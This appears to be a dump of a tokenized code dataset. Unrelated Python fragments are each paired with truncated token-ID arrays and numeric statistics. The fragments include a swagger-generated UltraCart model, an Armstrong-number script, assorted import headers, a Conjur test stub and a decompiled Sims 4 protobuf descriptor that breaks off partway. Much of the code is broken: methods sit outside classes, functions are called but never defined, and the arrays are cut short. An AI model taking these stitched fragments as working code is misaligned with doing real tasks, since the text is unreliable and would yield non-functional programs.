[ 6738, 285, 87, 3262, 1330, 299, 67, 198, 11748, 28686, 198, 11748, 25064, 198, 17597, 13, 6978, 13, 33295, 7, 418, 13, 6978, 13, 397, 2777, 776, 7, 418, 13, 6978, 13, 22179, 7, 418, 13, 6978, 13, 15908, 3672, 7, 11593, 7753, 834, ...
2.541284
545
# coding: utf-8 """ UltraCart Rest API V2 UltraCart REST API Version 2 # noqa: E501 OpenAPI spec version: 2.0.0 Contact: support@ultracart.com Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, ApplyLibraryItemResponse): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
[ 2, 19617, 25, 3384, 69, 12, 23, 198, 198, 37811, 198, 220, 220, 220, 14563, 43476, 8324, 7824, 569, 17, 628, 220, 220, 220, 14563, 43476, 30617, 7824, 10628, 362, 220, 1303, 645, 20402, 25, 412, 33548, 628, 220, 220, 220, 4946, 1761...
2.52381
336
np_pressures_hPa * math.exp(-gravit_acc * molar_mass_earth* height/(gas_constant*standard_temperature))
[ 37659, 62, 8439, 942, 62, 71, 28875, 1635, 10688, 13, 11201, 32590, 70, 4108, 270, 62, 4134, 1635, 285, 6192, 62, 22208, 62, 16442, 9, 6001, 29006, 22649, 62, 9979, 415, 9, 20307, 62, 11498, 21069, 4008 ]
2.783784
37
from pytest import mark # if setup.py present, code could be installed as library # so that there's no need include path # pip install -e . from pytest_resources import do_lower_case # from src.for_testing import do_lower_case
[ 6738, 12972, 9288, 1330, 1317, 198, 198, 2, 611, 9058, 13, 9078, 1944, 11, 2438, 714, 307, 6589, 355, 5888, 198, 2, 523, 326, 612, 338, 645, 761, 2291, 3108, 198, 2, 7347, 2721, 532, 68, 764, 198, 6738, 12972, 9288, 62, 37540, 133...
3.578125
64
import re import os # copy required files # change actions.c to add flow_radar lock # change p4_pd_rpc_server.ipp if __name__ == "__main__": copy_files() change_actions_c() change_p4_pd_rpc_server_ipp() change_p4_pd_rpc_thrift()
[ 11748, 302, 198, 11748, 28686, 198, 198, 2, 4866, 2672, 3696, 198, 198, 2, 1487, 4028, 13, 66, 284, 751, 5202, 62, 6335, 283, 5793, 198, 198, 2, 1487, 279, 19, 62, 30094, 62, 81, 14751, 62, 15388, 13, 3974, 198, 198, 361, 11593, ...
2.418367
98
#!/usr/bin/python3 # -*- coding: utf-8 -*- # calculation tool for a bridge circuit with two input current sources # two current sources can supply from both of top of the bridge and middle of the bridge # define the voltage name as follows: # Vp: voltage at the top of the bridge # Vn: voltage at the middle of the bridge if __name__ == '__main__': main()
[ 2, 48443, 14629, 14, 8800, 14, 29412, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 2, 17952, 2891, 329, 257, 7696, 10349, 351, 734, 5128, 1459, 4237, 198, 2, 734, 1459, 4237, 460, 5127, 422, 1111, ...
3.392523
107
#Program to check whether the number is an armstrong number or not #Ask user to enter the number number=int(input("Enter the number you want to check armstrong: ")) #To calculate the length of number entered. order=len(str(number)) #Initialise sum to 0 sum=0 temp=number while temp>0: num=temp%10 sum+=num**order temp//=10 if (number==sum): print("The number you have entered is an Armstrong number.") else: print("The number you have entered is not an Armstrong number.") #OUTPUT: #Enter the number you want to check armstrong: 1634 #The number you have entered is an Armstrong number.
[ 2, 15167, 284, 2198, 1771, 262, 1271, 318, 281, 3211, 11576, 1271, 393, 407, 198, 2, 25214, 2836, 284, 3802, 262, 1271, 198, 17618, 28, 600, 7, 15414, 7203, 17469, 262, 1271, 345, 765, 284, 2198, 3211, 11576, 25, 220, 366, 4008, 198...
3.21875
192
from pyexlatex.models.sizes.textwidth import TextWidth from pyexlatex.models.format.rule import Rule
[ 6738, 12972, 1069, 17660, 87, 13, 27530, 13, 82, 4340, 13, 5239, 10394, 1330, 8255, 30916, 198, 6738, 12972, 1069, 17660, 87, 13, 27530, 13, 18982, 13, 25135, 1330, 14330, 628 ]
3.290323
31
from math import sqrt import asks import datetime import numpy as np import random from PIL import Image from PIL.ImageDraw import Draw from PIL.ImageEnhance import Brightness from PIL.ImageFont import truetype from curio import spawn_thread from curious.commands import Context, Plugin, command from io import BytesIO from sixx.plugins.utils.pillow import add_noise, add_scanlines, antialiased_text, save_image SCANLINES, NOISE, BOTH = range(3)
[ 6738, 10688, 1330, 19862, 17034, 198, 198, 11748, 7893, 198, 11748, 4818, 8079, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 4738, 198, 6738, 350, 4146, 1330, 7412, 198, 6738, 350, 4146, 13, 5159, 25302, 1330, 15315, 198, 6738, 350, ...
3.284672
137
import logging from maskgen import video_tools import random import maskgen.video_tools import os import maskgen import json plugin = "DonorPicker"
[ 11748, 18931, 198, 6738, 9335, 5235, 1330, 2008, 62, 31391, 198, 11748, 4738, 198, 11748, 9335, 5235, 13, 15588, 62, 31391, 198, 11748, 28686, 198, 11748, 9335, 5235, 198, 11748, 33918, 198, 198, 33803, 796, 366, 3987, 273, 47, 15799, 1...
3.609756
41
import caffe import numpy as np import os import sys import track_model_train as track_model import train_config max_iter = 1000 if __name__ == '__main__': config = train_config.Config() eval_avg_scores(config)
[ 11748, 21121, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 28686, 198, 11748, 25064, 198, 198, 11748, 2610, 62, 19849, 62, 27432, 355, 2610, 62, 19849, 198, 11748, 4512, 62, 11250, 198, 198, 9806, 62, 2676, 796, 8576, 198, 361, 11593...
2.907895
76
# # Copyright (C) 2014 Conjur Inc # # Permission is hereby granted, free of charge, to any person obtaining a copy of # this software and associated documentation files (the "Software"), to deal in # the Software without restriction, including without limitation the rights to # use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of # the Software, and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS # FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR # COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER # IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. from mock import patch import conjur api = conjur.new_from_key('foo', 'bar') group = api.group('v1/admins')
[ 2, 198, 2, 15069, 357, 34, 8, 1946, 37587, 333, 3457, 198, 2, 198, 2, 2448, 3411, 318, 29376, 7520, 11, 1479, 286, 3877, 11, 284, 597, 1048, 16727, 257, 4866, 286, 198, 2, 428, 3788, 290, 3917, 10314, 3696, 357, 1169, 366, 25423, ...
3.701538
325
# uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: D:\dev\TS4\_deploy\Client\Releasex64\Python\Generated\protocolbuffers\Social_pb2.py # Compiled at: 2020-12-13 14:24:09 # Size of source mod 2**32: 103336 bytes from google.protobuf import descriptor from google.protobuf import message from google.protobuf import reflection from google.protobuf import descriptor_pb2 import protocolbuffers.Consts_pb2 as Consts_pb2 import protocolbuffers.Chat_pb2 as Chat_pb2 import protocolbuffers.S4Common_pb2 as S4Common_pb2 import protocolbuffers.Localization_pb2 as Localization_pb2 import protocolbuffers.Exchange_pb2 as Exchange_pb2 DESCRIPTOR = descriptor.FileDescriptor(name='Social.proto', package='EA.Sims4.Network', serialized_pb='\n\x0cSocial.proto\x12\x10EA.Sims4.Network\x1a\x0cConsts.proto\x1a\nChat.proto\x1a\x0eS4Common.proto\x1a\x12Localization.proto\x1a\x0eExchange.proto"v\n\x0fSocialFriendMsg\x12\r\n\x05simId\x18\x01 \x01(\x04\x12\x11\n\tnucleusid\x18\x02 \x01(\x04\x12\x0c\n\x04note\x18\x03 \x01(\t\x12\x0e\n\x06prefix\x18\x04 \x01(\t\x12\x0f\n\x07persona\x18\x05 \x01(\t\x12\x12\n\ncheatForce\x18\x06 \x01(\x08",\n\x18SocialPersonaResponseMsg\x12\x10\n\x08personas\x18\x01 \x03(\t"\x7f\n\x15SocialGenericResponse\x12\r\n\x05error\x18\x01 \x01(\r\x121\n\x08msg_type\x18\x02 \x01(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12\x0e\n\x06postId\x18\x03 \x01(\x0c\x12\x14\n\x0cpostParentId\x18\x04 \x01(\x0c"\x02\n\x14SocialPlayerInfoList\x12B\n\x07players\x18\x01 \x03(\x0b21.EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo\x1a\x01\n\nPlayerInfo\x12\x13\n\x0bAccountName\x18\x01 \x01(\t\x12\x14\n\x0cAccountNotes\x18\x02 \x01(\t\x128\n\x08presence\x18\x03 \x01(\x0e2&.EA.Sims4.Network.OnlinePresenceStatus\x12\x15\n\rOnlineStatus2\x18\x04 \x01(\t\x12\x11\n\tNucleusId\x18\t \x01(\x04\x12\x11\n\tPlayerBio\x18\n \x01(\t\x12\x18\n\x10exclude_reported\x18\x0b 
\x01(\x08\x12\x15\n\rIsUserBlocked\x18\x0c \x01(\x08"a\n\x0fSocialSearchMsg\x12\x0e\n\x06prefix\x18\x01 \x01(\t\x12>\n\x0esearch_results\x18\x02 \x03(\x0b2&.EA.Sims4.Network.LocalizedStringToken"=\n\x12OriginErrorMessage\x12\x11\n\terrorcode\x18\x01 \x01(\r\x12\x14\n\x0cerrormessage\x18\x02 \x01(\t"\x97\x01\n\x1bSocialInviteResponseMessage\x12\x14\n\x0cinvitationid\x18\x01 \x01(\t\x12\x16\n\x0einvitationtype\x18\x02 \x01(\r\x12\x18\n\x10inviternucleusid\x18\x03 \x01(\x04\x12\x19\n\x11accepternucleusid\x18\x04 \x01(\x04\x12\x15\n\ractionSuccess\x18\x05 \x01(\x08"J\n\x13SocialCassandraTest\x123\n\x06opcode\x18\x01 \x01(\x0e2#.EA.Sims4.Network.CassandraTestCode"\x88\x01\n\x1eSocialFriendListRequestMessage\x12\x12\n\naccount_id\x18\x01 \x01(\x04\x12\x11\n\tfriend_id\x18\x02 \x01(\x04\x12\x13\n\x0baddress_str\x18\x03 \x01(\t\x12\x12\n\nobject_str\x18\x04 \x01(\t\x12\x16\n\x0ereply_proxy_id\x18\x05 \x01(\x04"_\n!SocialRequestNucleusIdFromPersona\x12\x11\n\trequestid\x18\x01 \x01(\x04\x12\x13\n\x0bpersonaName\x18\x02 \x01(\t\x12\x12\n\nmessage_id\x18\x03 \x01(\r"^\n"SocialNucleusIdFromPersonaResponse\x12\x11\n\trequestid\x18\x01 \x01(\x04\x12\x11\n\tnucleusid\x18\x02 \x01(\x04\x12\x12\n\nmessage_id\x18\x03 \x01(\r"S\n\x15SocialExchangeMessage\x12:\n\x08envelope\x18\x01 \x01(\x0b2(.EA.Sims4.Network.ExchangeSocialEnvelope"+\n\x16SocialFollowersMessage\x12\x11\n\tsfim_blob\x18\x01 \x03(\x0c"\x02\n\x15SocialFeedItemMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c\x127\n\tfeed_type\x18\x02 \x01(\x0e2$.EA.Sims4.Network.SocialFeedItemType\x120\n\x08metadata\x18\x03 \x01(\x0b2\x1e.EA.Sims4.Network.TrayMetadata\x12\x11\n\tnucleusid\x18\x04 \x01(\x04\x12\x0f\n\x07persona\x18\x05 \x01(\t\x12\x10\n\x08quantity\x18\x06 \x01(\x04\x12\x1a\n\x12follower_nucleusid\x18\x07 \x01(\x04\x12\x18\n\x10follower_persona\x18\x08 \x01(\t\x12@\n\x0efollowers_blob\x18\t \x01(\x0b2(.EA.Sims4.Network.SocialFollowersMessage\x12\x18\n\x10is_maxis_curated\x18\n 
\x01(\x08"Z\n!SocialFeedItemUnserializedMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c\x12\x0c\n\x04data\x18\x02 \x01(\x0c\x12\x16\n\x0ecount_override\x18\x03 \x01(\x04"d\n\x18SocialWallCommentMessage\x12\x0c\n\x04uuid\x18\x01 \x01(\x0c\x12\x11\n\tauthor_id\x18\x02 \x01(\x04\x12\x16\n\x0eauthor_persona\x18\x03 \x01(\t\x12\x0f\n\x07message\x18\x04 \x01(\t"\x01\n\x1cSocialGetWallCommentsMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12\x15\n\rstarting_uuid\x18\x03 \x01(\x0c\x12\x13\n\x0bnum_results\x18\x04 \x01(\r\x12<\n\x08messages\x18\x05 \x03(\x0b2*.EA.Sims4.Network.SocialWallCommentMessage\x12\x0e\n\x06hidden\x18\x06 \x01(\x08\x12\x18\n\x10exclude_reported\x18\x07 \x01(\x08"\x82\x01\n\x1cSocialPostWallCommentMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12;\n\x07message\x18\x03 \x01(\x0b2*.EA.Sims4.Network.SocialWallCommentMessage"U\n\x1eSocialDeleteWallCommentMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12\x0c\n\x04uuid\x18\x03 \x01(\x0c"\x01\n\x1cSocialRequestFeedWallMessage\x12\x13\n\x0bending_uuid\x18\x01 \x01(\x0c\x129\n\x08messages\x18\x02 \x03(\x0b2\'.EA.Sims4.Network.SocialFeedItemMessage\x12R\n\x15unserialized_messages\x18\x03 \x03(\x0b23.EA.Sims4.Network.SocialFeedItemUnserializedMessage\x12\x11\n\tnum_items\x18\x04 \x01(\r"m\n\x1dSocialRequestFollowersMessage\x12\x10\n\x08playerid\x18\x01 \x01(\x04\x12\n\n\x02id\x18\x02 \x01(\t\x12\x19\n\x11prev_last_persona\x18\x03 \x01(\t\x12\x13\n\x0bnum_request\x18\x04 \x01(\r";\n\x1eSocialRequestIgnoreListMessage\x12\x19\n\x11player_nucleus_id\x18\x01 \x01(\x04"\x01\n\x1eSocialGetPlayerInfoListMessage\x12\x19\n\x11player_nucleus_id\x18\x01 \x01(\x04\x12U\n\x10player_info_list\x18\x02 \x03(\x0b2;.EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo\x1aU\n\nPlayerInfo\x12\x12\n\nnucleus_id\x18\x01 \x01(\x04\x12\x16\n\x0eorigin_persona\x18\x02 
\x01(\t\x12\x1b\n\x13first_party_persona\x18\x03 \x01(\t"X\n\x1cSocialCommentPetitionMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x11\n\tcommentid\x18\x02 \x01(\x0c\x12\x12\n\ncommentKey\x18\x03 \x01(\t"D\n\x18SocialBioPetitionMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x15\n\rbio_nucleusid\x18\x02 \x01(\x04"+\n\x18SocialFeedRemovalMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c"\x8f\x12\n\x14SocialControlMessage\x12/\n\x06opcode\x18\x01 \x02(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12.\n\x05subop\x18\x02 \x01(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12\x15\n\rtransactionId\x18\x03 \x01(\x04\x12\x0e\n\x06result\x18d \x01(\r\x12J\n\x12getwallcommentsmsg\x18\x04 \x01(\x0b2..EA.Sims4.Network.SocialGetWallCommentsMessage\x12J\n\x12postwallcommentmsg\x18\x05 \x01(\x0b2..EA.Sims4.Network.SocialPostWallCommentMessage\x12N\n\x14deletewallcommentmsg\x18\x06 \x01(\x0b20.EA.Sims4.Network.SocialDeleteWallCommentMessage\x124\n\tfriendmsg\x18\x07 \x01(\x0b2!.EA.Sims4.Network.SocialFriendMsg\x12@\n\x0fgenericresponse\x18\x08 \x01(\x0b2\'.EA.Sims4.Network.SocialGenericResponse\x12:\n\nplayerinfo\x18\t \x01(\x0b2&.EA.Sims4.Network.SocialPlayerInfoList\x12:\n\nfeedsubmsg\x18\n \x01(\x0b2&.EA.Sims4.Network.SocialFeedSubMessage\x12:\n\x0fsearchresultmsg\x18\x0b \x01(\x0b2!.EA.Sims4.Network.SocialSearchMsg\x12H\n\x11inviteresponsemsg\x18\x0c \x01(\x0b2-.EA.Sims4.Network.SocialInviteResponseMessage\x129\n\x0boriginerror\x18\r \x01(\x0b2$.EA.Sims4.Network.OriginErrorMessage\x12B\n\x13socialcassandratest\x18\x0e \x01(\x0b2%.EA.Sims4.Network.SocialCassandraTest\x12T\n\x1asocialfriendlistrequestmsg\x18\x0f \x01(\x0b20.EA.Sims4.Network.SocialFriendListRequestMessage\x12^\n!socialrequestnucleusidfrompersona\x18\x10 \x01(\x0b23.EA.Sims4.Network.SocialRequestNucleusIdFromPersona\x12`\n"socialnucleusidfrompersonaresponse\x18\x11 \x01(\x0b24.EA.Sims4.Network.SocialNucleusIdFromPersonaResponse\x12F\n\x15socialexchangemessage\x18\x12 
\x01(\x0b2\'.EA.Sims4.Network.SocialExchangeMessage\x12T\n\x1csocialrequestfeedwallmessage\x18\x13 \x01(\x0b2..EA.Sims4.Network.SocialRequestFeedWallMessage\x12A\n\x0cstat_tickers\x18\x15 \x01(\x0b2+.EA.Sims4.Network.ExchangeStatTickerMessage\x12L\n\x14comment_petition_msg\x18\x16 \x01(\x0b2..EA.Sims4.Network.SocialCommentPetitionMessage\x12B\n\x0efeedremovalmsg\x18\x17 \x01(\x0b2*.EA.Sims4.Network.SocialFeedRemovalMessage\x12D\n\x10bio_petition_msg\x18\x18 \x01(\x0b2*.EA.Sims4.Network.SocialBioPetitionMessage\x12B\n\x0cfb_event_msg\x18\x19 \x01(\x0b2,.EA.Sims4.Network.SocialFacebookEventMessage\x12M\n\x14requestfollowers_msg\x18\x1a \x01(\x0b2/.EA.Sims4.Network.SocialRequestFollowersMessage\x12O\n\x15responsefollowers_msg\x18\x1b \x01(\x0b20.EA.Sims4.Network.SocialResponseFollowersMessage\x12O\n\x15requestignorelist_msg\x18\x1c \x01(\x0b20.EA.Sims4.Network.SocialRequestIgnoreListMessage\x12W\n\x1dresponse_player_info_list_msg\x18\x1d \x01(\x0b20.EA.Sims4.Network.SocialGetPlayerInfoListMessage\x12_\n\x1eplayer_identification_list_msg\x18\x1e \x01(\x0b27.EA.Sims4.Network.ServerPlayerIdentificationListMessage\x12@\n\rcandidate_msg\x18\x1f \x01(\x0b2).EA.Sims4.Network.SocialCandidatesMessage\x12P\n\x16evaluation_results_msg\x18 \x01(\x0b20.EA.Sims4.Network.SocialEvaluationResultsMessage\x12>\n\rcg_update_msg\x18! 
\x01(\x0b2\'.EA.Sims4.Network.SocialCGUpdateMessage"7\n\x13SocialInvalidateMsg\x12\x13\n\x0bcache_index\x18\x01 \x01(\r\x12\x0b\n\x03key\x18\x02 \x01(\x0c"t\n"SocialControlQueueBroadcastMessage\x127\n\x07control\x18\x01 \x01(\x0b2&.EA.Sims4.Network.SocialControlMessage\x12\x15\n\tfriendIds\x18\x03 \x03(\x04B\x02\x10\x01"5\n\x10LifeEventMessage\x12\x0c\n\x04type\x18\x01 \x01(\r\x12\x13\n\x07sim_ids\x18\x02 \x03(\x06B\x02\x10\x01"Q\n\x1aSocialFacebookEventMessage\x12\x10\n\x08objectId\x18\x01 \x02(\t\x12\x13\n\x0baccessToken\x18\x02 \x02(\t\x12\x0c\n\x04guid\x18\x03 \x02(\t"\x01\n"SocialCandidateStatisticSubmessage\x12\x11\n\tremote_id\x18\x01 \x01(\x0c\x12\x13\n\x0bviews_count\x18\x02 \x01(\r\x12\x12\n\nwins_count\x18\x03 \x01(\r\x12\x10\n\x08platform\x18\x04 \x01(\r\x12\x10\n\x08category\x18\x05 \x01(\r\x12\x18\n\x0cwas_reported\x18\x06 \x01(\x08B\x02\x18\x01\x12\x19\n\x11expires_epoch_sec\x18\x07 \x01(\x04"\x01\n\x17SocialCandidatesMessage\x12\r\n\x05count\x18\x01 \x01(\r\x12\x1c\n\x14platform_restriction\x18\x02 \x01(\r\x12\x1c\n\x14category_restriction\x18\x03 \x01(\r\x12\x11\n\tchallenge\x18\x04 \x01(\t\x12\x0e\n\x06digest\x18\x05 \x01(\x0c\x12H\n\ncandidates\x18\x06 \x03(\x0b24.EA.Sims4.Network.SocialCandidateStatisticSubmessage\x12\x19\n\x11expire_epoch_secs\x18\x07 \x01(\x04"W\n\x1eSocialEvaluationResultsMessage\x12\x12\n\nwinner_ids\x18\x01 \x03(\t\x12\x11\n\tloser_ids\x18\x02 \x03(\t\x12\x0e\n\x06digest\x18\x03 \x01(\x0c"t\n\x15SocialCGDigestMessage\x12\x11\n\tchallenge\x18\x01 \x01(\t\x12H\n\ncandidates\x18\x02 
\x03(\x0b24.EA.Sims4.Network.SocialCandidateStatisticSubmessage*\x01\n\x12SocialFeedItemType\x12\x17\n\x13SFI_ITEM_DOWNLOADED\x10\x00\x12\x15\n\x11SFI_ITEM_UPLOADED\x10\x01\x12\x16\n\x12SFI_ITEM_FAVORITED\x10\x02\x12\x16\n\x12SFI_ITEM_COMMENTED\x10\x03\x12\x16\n\x12SFI_ITEM_SHOWCASED\x10\x04\x12\x19\n\x15SFI_PROFILE_COMMENTED\x10\x05\x12\x15\n\x11SFI_NEW_FOLLOWERS\x10\x06*\x86\x02\n\x18SocialClusterMessageType\x12\r\n\tSOC_LOGIN\x10\x00\x12\x0e\n\nSOC_LOGOFF\x10\x01\x12\x16\n\x12SOC_PRESENCEUPDATE\x10\x02\x12\x12\n\x0eSOC_FEEDUPDATE\x10\x03\x12\x13\n\x0fSOC_ADD_FEEDSUB\x10\x04\x12\x16\n\x12SOC_REMOVE_FEEDSUB\x10\x05\x12\x18\n\x14SOC_BROADCAST_PRIVOP\x10\x06\x12\x18\n\x14SOC_BROADCAST_QUEUED\x10\x08\x12"\n\x1eSOC_BROADCAST_CACHE_INVALIDATE\x10\t\x12\x1a\n\x16SOC_REST_USER_REGISTER\x10\n') _SOCIALFEEDITEMTYPE = descriptor.EnumDescriptor(name='SocialFeedItemType', full_name='EA.Sims4.Network.SocialFeedItemType', filename=None, file=DESCRIPTOR, values=[ descriptor.EnumValueDescriptor(name='SFI_ITEM_DOWNLOADED', index=0, number=0, options=None, type=None), descriptor.EnumValueDescriptor(name='SFI_ITEM_UPLOADED', index=1, number=1, options=None, type=None), descriptor.EnumValueDescriptor(name='SFI_ITEM_FAVORITED', index=2, number=2, options=None, type=None), descriptor.EnumValueDescriptor(name='SFI_ITEM_COMMENTED', index=3, number=3, options=None, type=None), descriptor.EnumValueDescriptor(name='SFI_ITEM_SHOWCASED', index=4, number=4, options=None, type=None), descriptor.EnumValueDescriptor(name='SFI_PROFILE_COMMENTED', index=5, number=5, options=None, type=None), descriptor.EnumValueDescriptor(name='SFI_NEW_FOLLOWERS', index=6, number=6, options=None, type=None)], containing_type=None, options=None, serialized_start=6663, serialized_end=6853) _SOCIALCLUSTERMESSAGETYPE = descriptor.EnumDescriptor(name='SocialClusterMessageType', full_name='EA.Sims4.Network.SocialClusterMessageType', filename=None, file=DESCRIPTOR, values=[ descriptor.EnumValueDescriptor(name='SOC_LOGIN', 
index=0, number=0, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_LOGOFF', index=1, number=1, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_PRESENCEUPDATE', index=2, number=2, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_FEEDUPDATE', index=3, number=3, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_ADD_FEEDSUB', index=4, number=4, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_REMOVE_FEEDSUB', index=5, number=5, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_BROADCAST_PRIVOP', index=6, number=6, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_BROADCAST_QUEUED', index=7, number=8, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_BROADCAST_CACHE_INVALIDATE', index=8, number=9, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_REST_USER_REGISTER', index=9, number=10, options=None, type=None)], containing_type=None, options=None, serialized_start=6856, serialized_end=7118) SFI_ITEM_DOWNLOADED = 0 SFI_ITEM_UPLOADED = 1 SFI_ITEM_FAVORITED = 2 SFI_ITEM_COMMENTED = 3 SFI_ITEM_SHOWCASED = 4 SFI_PROFILE_COMMENTED = 5 SFI_NEW_FOLLOWERS = 6 SOC_LOGIN = 0 SOC_LOGOFF = 1 SOC_PRESENCEUPDATE = 2 SOC_FEEDUPDATE = 3 SOC_ADD_FEEDSUB = 4 SOC_REMOVE_FEEDSUB = 5 SOC_BROADCAST_PRIVOP = 6 SOC_BROADCAST_QUEUED = 8 SOC_BROADCAST_CACHE_INVALIDATE = 9 SOC_REST_USER_REGISTER = 10 _SOCIALFRIENDMSG = descriptor.Descriptor(name='SocialFriendMsg', full_name='EA.Sims4.Network.SocialFriendMsg', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='simId', full_name='EA.Sims4.Network.SocialFriendMsg.simId', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='nucleusid', 
full_name='EA.Sims4.Network.SocialFriendMsg.nucleusid', index=1, number=2, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='note', full_name='EA.Sims4.Network.SocialFriendMsg.note', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='prefix', full_name='EA.Sims4.Network.SocialFriendMsg.prefix', index=3, number=4, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='persona', full_name='EA.Sims4.Network.SocialFriendMsg.persona', index=4, number=5, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='cheatForce', full_name='EA.Sims4.Network.SocialFriendMsg.cheatForce', index=5, number=6, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=112, serialized_end=230) _SOCIALPERSONARESPONSEMSG = descriptor.Descriptor(name='SocialPersonaResponseMsg', full_name='EA.Sims4.Network.SocialPersonaResponseMsg', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='personas', full_name='EA.Sims4.Network.SocialPersonaResponseMsg.personas', index=0, 
number=1, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=232, serialized_end=276) _SOCIALGENERICRESPONSE = descriptor.Descriptor(name='SocialGenericResponse', full_name='EA.Sims4.Network.SocialGenericResponse', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='error', full_name='EA.Sims4.Network.SocialGenericResponse.error', index=0, number=1, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='msg_type', full_name='EA.Sims4.Network.SocialGenericResponse.msg_type', index=1, number=2, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='postId', full_name='EA.Sims4.Network.SocialGenericResponse.postId', index=2, number=3, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='postParentId', full_name='EA.Sims4.Network.SocialGenericResponse.postParentId', index=3, number=4, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=278, serialized_end=405) _SOCIALPLAYERINFOLIST_PLAYERINFO = descriptor.Descriptor(name='PlayerInfo', 
